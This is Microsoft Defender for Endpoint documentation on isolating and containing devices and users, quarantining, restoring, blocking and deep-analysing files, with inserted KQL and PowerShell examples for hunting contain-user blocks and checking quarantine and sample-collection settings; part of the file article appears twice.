You can use the device isolation capability on all supported versions of Microsoft Defender for Endpoint on Linux listed in System requirements. Ensure that the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709 or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For more information, see Create and manage device groups.
Exclusions are not supported for macOS and Linux isolation.
An isolated device is removed from isolation when an administrator modifies or adds a new iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a 'Selective Isolation').

Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against external threats. However, there are instances when isolated devices become unresponsive. There's a downloadable script for these instances that you can run to forcibly release devices from isolation. The script is available through a link in the UI.

Note

Admins and users with the "Manage security settings in Security Center" permission can forcibly release devices from isolation.
The script is valid for the specific device only.
The script expires in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from isolation from the action menu.
2. In the wizard on the right-hand side, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Supports only Windows
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions, with KB5023774
Windows 11 version 22H2, all editions, with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the user that the device is being isolated from the network.

Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially compromised, you might want to contain that device from the network. When you contain a device, any Microsoft Defender for Endpoint onboarded device blocks incoming and outgoing communication with that device. This action can help prevent neighboring devices from becoming compromised while the security operations analyst locates, identifies, and remediates the threat on the compromised device.

Note

Blocking incoming and outgoing communication with a 'contained' device is supported on onboarded Microsoft Defender for Endpoint Windows 10 and Windows Server 2019+ devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.
2. Select Contain device from the actions menu in the device flyout.
3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from the action bar.

Note

It can take up to 5 minutes for the details about a newly contained device to reach Microsoft Defender for Endpoint onboarded devices.

Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (It may take up to 5 mins to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.
2. Select Release from containment from the action menu. This action restores the device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that identity from accessing the network and different endpoints. Defender for Endpoint can "contain" an identity, blocking it from access and helping prevent attacks, specifically ransomware. When an identity is contained, any supported Microsoft Defender for Endpoint onboarded device blocks incoming traffic in specific protocols related to attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action can significantly help to reduce the impact of an attack. When an identity is contained, security operations analysts have extra time to locate, identify, and remediate the threat to the compromised identity.

Note

Blocking incoming communication with a "contained" user is supported on onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense version 8740 and higher), Windows Server 2019+ devices, and Windows Server 2012 R2 and 2016 devices with the modern agent.

How to contain a user

Currently, containing users is only available automatically, by using automatic attack disruption. When Microsoft detects a user as being compromised, a "Contain User" policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action center. There, you can see when the action occurred and which users in your organization were contained.

Furthermore, after an identity is considered "contained", that user is blocked by Defender for Endpoint and cannot perform any malicious lateral movement or remote encryption on or to any supported Defender for Endpoint onboarded device. These blocks show up as alerts to help you quickly see the devices the compromised user attempted to access and the potential attack techniques.

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action center. In the side pane, select Undo.
2. Alternatively, select the user from the user inventory, the Incident page side pane, or the alert side pane, and select Undo.

This action restores the user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked actions by the compromised user. In the Device timeline view, you can see information about specific events, including protocol and interface granularity, and the relevant MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.
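The Advanced Hunting step above, written out as a query (an added example, not part of the Microsoft article): it pulls the Contain User blocks recorded in the DeviceEvents table for the last seven days and rolls them up per blocked account, so an analyst can see which devices the contained identity tried to reach and how often. The table name and the ActionType filter come from the article; the other column names are assumed from the standard DeviceEvents schema, and AdditionalFields is assumed to carry the per-block protocol and technique context that the device timeline shows.

```kql
// Added example, not from the Microsoft documentation. Assumes the standard
// DeviceEvents columns Timestamp, DeviceName, ActionType, AccountName,
// AccountDomain, RemoteIP, RemotePort, LocalPort and AdditionalFields.
let ContainBlocks =
    DeviceEvents
    | where Timestamp > ago(7d)
    // The article: every Contain User block has an ActionType that starts with "Contain".
    | where ActionType startswith "Contain"
    // Domain\account form, so the same identity is not split across two rows.
    | extend BlockedAccount = strcat(AccountDomain, @"\", AccountName);
// Per-identity roll-up: how many blocks, over what window, against which devices,
// and from which source addresses the blocked traffic arrived.
ContainBlocks
| summarize Blocks        = count(),
            FirstBlock    = min(Timestamp),
            LastBlock     = max(Timestamp),
            ActionTypes   = make_set(ActionType),
            TargetDevices = make_set(DeviceName, 50),
            SourceIPs     = make_set(RemoteIP, 50)
    by BlockedAccount
| order by Blocks desc
```

To drill into a single block instead of the roll-up, replace the summarize with `| project Timestamp, DeviceName, ActionType, BlockedAccount, RemoteIP, RemotePort, LocalPort, AdditionalFields` and read the protocol and technique detail from AdditionalFields.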

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially compromised device, or devices that are already compromised. Microsoft Threat Experts can be engaged directly from within Microsoft Defender XDR for timely and accurate response. Experts provide insights not just regarding a potentially compromised device, but also to help you better understand complex threats, the targeted attack notifications that you get, the alerts, or the threat intelligence context that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file. You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting user, and whether the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Take response actions on a file
Article • 08/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files, you can check on activity details in the Action center.

Response actions are available on a file's detailed profile page. Once on this page, you
can switch between the new and old page layouts by toggling new File page. The rest of
this article describes the newer page layout.

Response actions run along the top of the file page, and include:

Stop and quarantine file
Manage indicator
Download file
Collect file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis

You can also submit files for deep analysis, to run the file in a secure cloud sandbox.
When the analysis is complete, you'll get a detailed report that provides information
about the behavior of the file. You can submit files for deep analysis and read past
reports by selecting the Deep analysis action.

Some actions require certain permissions. The following table describes what action certain permissions can take on portable executable (PE) and non-PE files:

Permission               PE files   Non-PE files
View data                X          X
Alerts investigation     ☑          X
Live response basic      X          X
Live response advanced   ☑          ☑

For more information on roles, see Create and manage roles for role-based access
control.

Stop and quarantine files in your network

You can contain an attack in your organization by stopping the malicious process and quarantining the file where it was observed.

Important

You can only take this action if:

The device you're taking the action on is running Windows 10, version 1703 or
later, Windows 11, and Windows Server 2012 R2+
The file does not belong to trusted third-party publishers or is not signed by
Microsoft
Microsoft Defender Antivirus must at least be running on Passive mode. For
more information, see Microsoft Defender Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining
the files, and deleting persistent data such as registry keys.

This action takes effect on devices with Windows 10, version 1703 or later, and Windows
11 and Server 2012 R2+, where the file was observed in the last 30 days.

Note

You'll be able to restore the file from quarantine at any time.

Stop and quarantine files

1. Select the file you want to stop and quarantine. You can select a file from any of
the following views or use the Search box:

Alerts - select the corresponding links from the Description or Details in the
Alert Story timeline
Search box - select File from the drop-down menu and enter the file name

Note

The stop and quarantine file action is limited to a maximum of 1000 devices.
To stop a file on a larger number of devices, see Add indicator to block or
allow file.

2. Go to the top bar and select Stop and Quarantine File.

3. Specify a reason, then select Confirm.

The Action center shows the submission information:

Submission time - Shows when the action was submitted.
Success - Shows the number of devices where the file has been stopped and quarantined.
Failed - Shows the number of devices where the action failed and details about the failure.
Pending - Shows the number of devices where the file is yet to be stopped and quarantined. This can take time in cases where the device is offline or not connected to the network.

4. Select any of the status indicators to view more information about the action. For example, select Failed to see where the action failed.

Notification on device user

When the file is being removed from a device, the following notification is shown.

In the device timeline, a new event is added for each device where a file was stopped
and quarantined.

A warning is shown before the action is implemented for files widely used throughout
an organization. It's to validate that the operation is intended.

Restore file from quarantine

You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.

1. Open an elevated command-line prompt on the device:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

dos

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name


EUS:Win32/CustomEnterpriseBlock -All
7 Note

In some scenarios, the ThreatName may appear as:


EUS:Win32/CustomEnterpriseBlock!cl.

Defender for Endpoint will restore all custom blocked files that were
quarantined on this device in the last 30 days.

) Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.
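The restore procedure above runs one MpCmdRun.exe command per device and relies on the
operator knowing which ThreatName variant (with or without the !cl suffix) is present. The
following PowerShell function is an added example, not code from the article or from
Microsoft: it enumerates quarantine first, restores only the custom enterprise block
ThreatNames actually found, and supports -WhatIf so the restore can be previewed. It
assumes MpCmdRun.exe is at the path the article uses, that "-Restore -ListAll" prints the
quarantined items including their ThreatName, and the function name
Restore-CustomEnterpriseBlock is hypothetical.

```powershell
<#
Added example, not code from the Microsoft article: enumerate Microsoft Defender
Antivirus quarantine on this device and restore the custom enterprise block items
that the Stop and Quarantine action produces, once the investigation has cleared
them. Run from an elevated PowerShell session on the affected device.

Assumptions, not stated by the article:
  - MpCmdRun.exe lives at "%ProgramFiles%\Windows Defender\MpCmdRun.exe" (the path
    the article's command uses).
  - "MpCmdRun.exe -Restore -ListAll" prints the quarantined items, including each
    ThreatName, so the exact name (with or without the "!cl" suffix) can be confirmed
    before anything is restored.
  - The function name Restore-CustomEnterpriseBlock is hypothetical.
#>
function Restore-CustomEnterpriseBlock {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # Path to MpCmdRun.exe; defaults to the location given in the article.
        [string]$MpCmdRunPath = (Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe')
    )

    if (-not (Test-Path -LiteralPath $MpCmdRunPath)) {
        throw "MpCmdRun.exe was not found at '$MpCmdRunPath'."
    }

    # Step 1: list everything in quarantine and keep only the custom enterprise block
    # ThreatNames actually present on this device (covers the "!cl" variant the
    # article's note mentions).
    $listing     = & $MpCmdRunPath -Restore -ListAll 2>&1 | Out-String
    $threatNames = [regex]::Matches($listing, 'EUS:Win32/CustomEnterpriseBlock(!cl)?') |
                   ForEach-Object { $_.Value } |
                   Sort-Object -Unique

    if (-not $threatNames) {
        Write-Host 'No EUS:Win32/CustomEnterpriseBlock items are in quarantine on this device.'
        return
    }

    # Step 2: restore every quarantined file under each matching ThreatName, exactly
    # as the article's command does (-Name <ThreatName> -All). -WhatIf previews only.
    foreach ($name in $threatNames) {
        if ($PSCmdlet.ShouldProcess("ThreatName $name", 'Restore all quarantined files')) {
            & $MpCmdRunPath -Restore -Name $name -All
            if ($LASTEXITCODE -ne 0) {
                Write-Warning "MpCmdRun.exe exited with code $LASTEXITCODE while restoring '$name'."
            }
        }
    }
}

# Preview first, then restore for real.
Restore-CustomEnterpriseBlock -WhatIf
Restore-CustomEnterpriseBlock
```

Because the function reads the quarantine listing before restoring, it does nothing on a
device where the file was never quarantined, and it surfaces a non-zero exit code from
MpCmdRun.exe rather than silently continuing, which matters when the same script is
pushed to many devices.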

Download or collect file

Selecting Download file from the response actions allows you to download a local,
password-protected .zip archive containing your file. A flyout will appear where you can
record a reason for downloading the file, and set a password.

By default, you should be able to download files that are in quarantine.

The Download file button can have the following states:

Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Microsoft Defender XDR Unified role-based access control (RBAC):

Add file collection permission in Microsoft Defender XDR Unified (RBAC)

For Microsoft Defender for Endpoint role-based access control (RBAC):

For Portable Executable file (.exe, .sys, .dll, and others): Global admin or Advanced live response or Alerts
For Non-Portable Executable file (.txt, .docx, and others): Global admin or Advanced live response

Tenants with role-based access (RBAC) permissions enabled

Download quarantined files

Files that have been quarantined by Microsoft Defender Antivirus or your security team
will be saved in a compliant way according to your sample submission configurations.
Your security team can download the files directly from the file's detail page via the
Download file button. This feature is turned on by default.

The location depends on your organization's geo settings (either EU, UK, or US). A
quarantined file will only be collected once per organization. Learn more about
Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP.

Having this setting turned on can help security teams examine potentially bad files and
investigate incidents quickly and in a less risky way. However, if you need to turn off this
setting, go to Settings > Endpoints > Advanced features > Download quarantined
files to adjust the setting. Learn more about advanced features.

Backing up quarantined files

Users may be prompted to provide explicit consent before backing up the quarantined
file, depending on your sample submission configuration.

This feature won't work if sample submission is turned off. If automatic sample
submission is set to request permission from the user, only samples that the user agrees
to send will be collected.

Important

Download quarantined file requirements:

Your organization uses Microsoft Defender Antivirus in active mode
Antivirus engine version is 1.1.17300.4 or later. See Monthly platform and engine versions
Cloud-based protection is enabled. See Turn on cloud-delivered protection
Sample submission is turned on
Devices have Windows 10 version 1703 or later, or Windows Server 2016 or 2019, or Windows Server 2022, or Windows 11
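Each of the requirements in the list above can be read from a device with the Defender
cmdlets that ship with Windows, which is useful when the Download file button is disabled
and you need to know which prerequisite is missing. The following PowerShell function is an
added example, not code from the article or from Microsoft. It assumes that
Get-MpComputerStatus.AMRunningMode equal to "Normal" means active mode, that
Get-MpPreference.MAPSReporting of 1 or 2 means cloud-delivered protection is on, that
SubmitSamplesConsent of 2 ("Never send") means sample submission is off, and that build
15063 (Windows 10 1703) and build 14393 (Windows Server 2016) are the oldest supported
builds for client and server respectively; the function name
Test-QuarantineDownloadPrereqs is hypothetical.

```powershell
<#
Added example, not code from the Microsoft article: check one device against the
"Download quarantined file requirements" listed above, using the Defender cmdlets
that ship with Windows. Run from an elevated PowerShell session.

Assumptions, not stated by the article:
  - Get-MpComputerStatus.AMRunningMode of "Normal" is taken as "active mode";
    "Passive Mode" and "EDR Block Mode" are not.
  - Get-MpPreference.MAPSReporting 1 (Basic) or 2 (Advanced) counts as cloud-delivered
    protection on; SubmitSamplesConsent 2 ("Never send") counts as sample submission off.
  - Build 15063 is treated as Windows 10 1703 and build 14393 as Windows Server 2016,
    the oldest builds in the article's list for each product type.
  - The function name Test-QuarantineDownloadPrereqs is hypothetical.
#>
function Test-QuarantineDownloadPrereqs {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    $os     = Get-CimInstance -ClassName Win32_OperatingSystem

    # Win32_OperatingSystem.ProductType: 1 = workstation, 2 = domain controller, 3 = server
    $build       = [int]$os.BuildNumber
    $isServer    = $os.ProductType -ne 1
    $osSupported = if ($isServer) { $build -ge 14393 } else { $build -ge 15063 }

    # One entry per requirement in the article's list, evaluated to $true/$false.
    $checks = [ordered]@{
        'Defender Antivirus in active mode'   = ($status.AMRunningMode -eq 'Normal')
        'Engine version 1.1.17300.4 or later' = ([version]$status.AMEngineVersion -ge [version]'1.1.17300.4')
        'Cloud-delivered protection enabled'  = ([int]$pref.MAPSReporting -in 1, 2)
        'Sample submission turned on'         = ([int]$pref.SubmitSamplesConsent -ne 2)
        'Supported Windows version'           = $osSupported
    }

    foreach ($entry in $checks.GetEnumerator()) {
        [pscustomobject]@{
            Requirement = $entry.Key
            Met         = [bool]$entry.Value
        }
    }
}

# Show each requirement and flag any that fail.
$results = Test-QuarantineDownloadPrereqs
$results | Format-Table -AutoSize
if ($results.Met -contains $false) {
    Write-Warning 'One or more requirements are not met; Download quarantined files will not work on this device.'
}
```

The function returns one object per requirement rather than a single pass/fail, so the
output can be collected from many devices and filtered for the specific requirement that
is failing across the fleet.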

Collect files

If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it.
Instead, you'll see a Collect file button in the same location.

The Collect file button can have the following states:

Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Portable Executable file (.exe, .sys, .dll, and others): Global admin or Advanced live response or Alerts
For Non-Portable Executable file (.txt, .docx, and others): Global admin or Advanced live response

If a file hasn't been seen in the organization in the past 30 days, Collect file will be
disabled.

Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible, because the system may no longer hold the network credentials needed to
access it. Typically, this happens when the file was reached through a temporary logon
to a system or shared folder and the access tokens have since expired.

Add indicator to block or allow a file

Prevent further propagation of an attack in your organization by banning potentially
malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.

Important

This feature is available if your organization uses Microsoft Defender Antivirus and
Cloud-delivered protection is enabled. For more information, see Manage cloud-delivered
protection.

The Antimalware client version must be 4.18.1901.x or later.

This feature is designed to prevent suspected malware (or potentially malicious files)
from being downloaded from the web. It currently supports portable executable (PE)
files, including .exe and .dll files. The coverage will be extended over time.

This response action is available for devices on Windows 10, version 1703 or later, and
Windows 11.

A file can't be allowed or blocked if its classification already exists in the device's
cache before the allow or block action is taken.

Note

The PE file needs to be in the device timeline for you to be able to take this action.

There may be a couple of minutes of latency between the time the action is taken and
the actual file being blocked.

Enable the block file feature

To start blocking files, you first need to turn the Block or allow feature on in Settings.

Allow or block file

When you add an indicator hash for a file, you can choose to raise an alert and block the
file whenever a device in your organization attempts to run it.

Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.

See manage indicators for more details on blocking and raising alerts on files.

To stop blocking a file, remove the indicator. You can do so via the Edit Indicator action
on the file's profile page. This action appears in the same position that the Add Indicator
action occupied before you added the indicator.

You can also edit indicators from the Settings page, under Rules > Indicators. Indicators
are listed in this area by their file's hash.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You can view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, such as submission date/time, submitting user,
and if the action succeeded or failed.

Deep analysis

Cybersecurity investigations are typically triggered by an alert. Alerts are related to one
or more observed files that are often new or unknown. Selecting a file takes you to the
file view where you can see the file's metadata. To enrich the data related to the file, you
can submit the file for deep analysis.

The Deep analysis feature executes a file in a secure, fully instrumented cloud
environment. Deep analysis results show the file's activities, observed behaviors, and
associated artifacts, such as dropped files, registry modifications, and communication
with IPs. Deep analysis currently supports extensive analysis of portable executable (PE)
files (including .exe and .dll files).

Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep
Analysis tab will update to display a summary and the date and time of the latest
available results.

The deep analysis summary includes a list of observed behaviors, some of which can
indicate malicious activity, and observables, including contacted IPs and files created on
the disk. If nothing was found, these sections will display a brief message.

Results of deep analysis are matched against threat intelligence and any matches will
generate appropriate alerts.

Use the deep analysis feature to investigate the details of any file, usually during an
investigation of an alert or for any other reason where you suspect malicious behavior.
This feature is available at the top of the file's page. Select the three dots to access the
Deep analysis action.

Learn about deep analysis in the following video:

https://www.microsoft.com/en-us/videoplayer/embed/RE4aAYy?rel=0&postJsllMsg=true

Submit for deep analysis is enabled when the file is available in the Defender for
Endpoint backend sample collection, or if it was observed on a Windows 10 device that
supports submitting to deep analysis.

Note

Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be
automatically collected.

You can also submit a sample through the Microsoft Defender portal if the file wasn't
observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and
wait for the Submit for deep analysis button to become available.

Note

Due to backend processing flows in the Microsoft Defender portal, there could be
up to 10 minutes of latency between file submission and availability of the deep
analysis feature in Defender for Endpoint.

Submit files for deep analysis

1. Select the file that you want to submit for deep analysis. You can select or search a
file from any of the following views:

Alerts - select the file links from the Description or Details in the Alert Story timeline
Devices list - select the file links from the Description or Details in the Device in organization section
Search box - select File from the drop-down menu and enter the file name

2. In the Deep analysis tab of the file view, select Submit.

Note

Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the
analysis. You can then view the report when the analysis is done.

Note

Depending on device availability, sample collection time can vary. There is a 3-hour
timeout for sample collection. The collection will fail and the operation will abort if
there is no online Windows 10 device (or Windows 11 or Windows Server 2012
R2+) reporting at that time. You can re-submit files for deep analysis to get fresh
data on the file.

View deep analysis reports

View the provided deep analysis report to see more in-depth insights on the file you
submitted. This feature is available in the file view context.

You can view the comprehensive report that provides details on the following sections:

Behaviors
Observables

The details provided can help you investigate if there are indications of a potential
attack.

1. Select the file you submitted for deep analysis.

2. Select the Deep analysis tab. If there are any previous reports, the report summary
will appear in this tab.

Troubleshoot deep analysis

If you come across a problem when trying to submit a file, try each of the following
troubleshooting steps.

1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll
extensions (executable programs or applications).

2. Ensure the service has access to the file, that it still exists, and hasn't been
corrupted or modified.

3. Wait a short while and try to submit the file again. The queue may be full, or there
was a temporary connection or communication error.

4. If the sample collection policy isn't configured, then the default behavior is to allow
sample collection. If it's configured, then verify the policy setting allows sample
collection before submitting the file again. When sample collection is configured,
then check the following registry value:

text

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the organizational unit through the Group Policy. For more information,
see Configure with Group Policy.

6. If these steps don't resolve the issue, contact support.
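Step 4 above describes the AllowSampleCollection policy value but leaves the check to the
reader. The following PowerShell function is an added example, not code from the article
or from Microsoft: it reads that value and reports the effective sample collection state
using exactly the semantics step 4 gives (value absent means the default, which allows
collection; 0 blocks; 1 allows). The only assumption beyond the article is the hypothetical
function name Get-SampleCollectionPolicy.

```powershell
<#
Added example, not code from the Microsoft article: read the AllowSampleCollection
policy value from troubleshooting step 4 and report the effective sample collection
setting, using the semantics the step gives (value absent = default allow, 0 = block,
1 = allow). Run in PowerShell on the device being checked.

Assumption, not stated by the article: the function name Get-SampleCollectionPolicy
is hypothetical.
#>
function Get-SampleCollectionPolicy {
    $keyPath   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $valueName = 'AllowSampleCollection'

    # Read the value only if the policy key exists; a missing key or value means the
    # policy is not configured, which step 4 says defaults to allowing collection.
    $value = $null
    if (Test-Path -LiteralPath $keyPath) {
        $item = Get-ItemProperty -LiteralPath $keyPath -Name $valueName -ErrorAction SilentlyContinue
        if ($null -ne $item) { $value = $item.$valueName }
    }

    if ($null -eq $value) {
        $effective = 'Not configured: default behavior allows sample collection'
    } elseif ($value -eq 0) {
        $effective = 'Blocked by policy: deep analysis submissions will not collect samples'
    } elseif ($value -eq 1) {
        $effective = 'Allowed by policy'
    } else {
        $effective = "Unexpected value $value; expected DWORD 0 or 1"
    }

    [pscustomobject]@{
        Path      = $keyPath
        Name      = $valueName
        Value     = $value
        Effective = $effective
    }
}

Get-SampleCollectionPolicy | Format-List
```

A value other than 0 or 1 is reported rather than treated as either state, since the
article documents only those two values and a stray DWORD is itself something worth
correcting through Group Policy (step 5).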

Related topics

Take response actions on a device
Investigate files
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.




Take response actions on a file
Article • 08/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a
file. After taking action on files, you can check on activity details in the Action center.

Response actions are available on a file's detailed profile page. Once on this page, you
can switch between the new and old page layouts by toggling new File page. The rest of
this article describes the newer page layout.

Response actions run along the top of the file page, and include:

Stop and quarantine file
Manage indicator
Download file
Collect file
Ask Defender Experts
Manual actions
Go hunt
Deep analysis

You can also submit files for deep analysis, to run the file in a secure cloud sandbox.
When the analysis is complete, you'll get a detailed report that provides information
about the behavior of the file. You can submit files for deep analysis and read past
reports by selecting the Deep analysis action.

Some actions require certain permissions. The following table describes which actions
each permission allows on portable executable (PE) and non-PE files (☑ = permitted,
X = not permitted):

Permission              PE files  Non-PE files
View data               X         X
Alerts investigation    ☑         X
Live response basic     X         X
Live response advanced  ☑         ☑

For more information on roles, see Create and manage roles for role-based access
control.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and
quarantining the file where it was observed.

Important

You can only take this action if:

The device you're taking the action on is running Windows 10, version 1703 or
later, Windows 11, or Windows Server 2012 R2 or later
The file isn't signed by Microsoft and doesn't belong to a trusted third-party
publisher
Microsoft Defender Antivirus is running at least in passive mode. For more
information, see Microsoft Defender Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining
the files, and deleting persistent data such as registry keys.

This action takes effect on devices with Windows 10, version 1703 or later, and Windows
11 and Server 2012 R2+, where the file was observed in the last 30 days.

Note

You can restore the file from quarantine at any time.


Stop and quarantine files
1. Select the file you want to stop and quarantine. You can select a file from any of
the following views or use the Search box:

Alerts - select the corresponding links from the Description or Details in the
Alert Story timeline
Search box - select File from the drop-down menu and enter the file name

Note

The stop and quarantine file action is limited to a maximum of 1000 devices.
To stop a file on a larger number of devices, see Add indicator to block or
allow file.

2. Go to the top bar and select Stop and Quarantine File.

3. Specify a reason, then select Confirm.


The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Success - Shows the number of devices where the file has been stopped and
quarantined.
Failed - Shows the number of devices where the action failed and details
about the failure.
Pending - Shows the number of devices where the file is yet to be stopped
and quarantined from. This can take time for cases when the device is offline
or not connected to the network.

4. Select any of the status indicators to view more information about the action. For
example, select Failed to see where the action failed.

Notification on device user

When the file is being removed from a device, a notification is shown to the signed-in
user of that device.

In the device timeline, a new event is added for each device where a file was stopped
and quarantined.

A warning is shown before the action is implemented for files widely used throughout
an organization. It's to validate that the operation is intended.

Restore file from quarantine


You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.

1. Open an elevated command-line prompt on the device:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

dos

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All

Note

In some scenarios, the ThreatName may appear as EUS:Win32/CustomEnterpriseBlock!cl.

Defender for Endpoint will restore all custom blocked files that were
quarantined on this device in the last 30 days.

Important

A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this happens after a temporary logon to a system or shared
folder whose access tokens have since expired.

Download or collect file


Selecting Download file from the response actions allows you to download a local,
password-protected .zip archive containing your file. A flyout will appear where you can
record a reason for downloading the file, and set a password.

By default, you should be able to download files that are in quarantine.

The Download file button can have the following states:

Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection
attempt, you may not have appropriate RBAC permissions to collect files.

The following permissions are required:

For Microsoft Defender XDR Unified role-based access control (RBAC):
Add file collection permission in Microsoft Defender XDR Unified (RBAC)

For Microsoft Defender for Endpoint role-based access control (RBAC), in tenants
with RBAC permissions enabled:
Portable Executable file (.exe, .sys, .dll, and others) - Global admin, Advanced
live response, or Alerts investigation
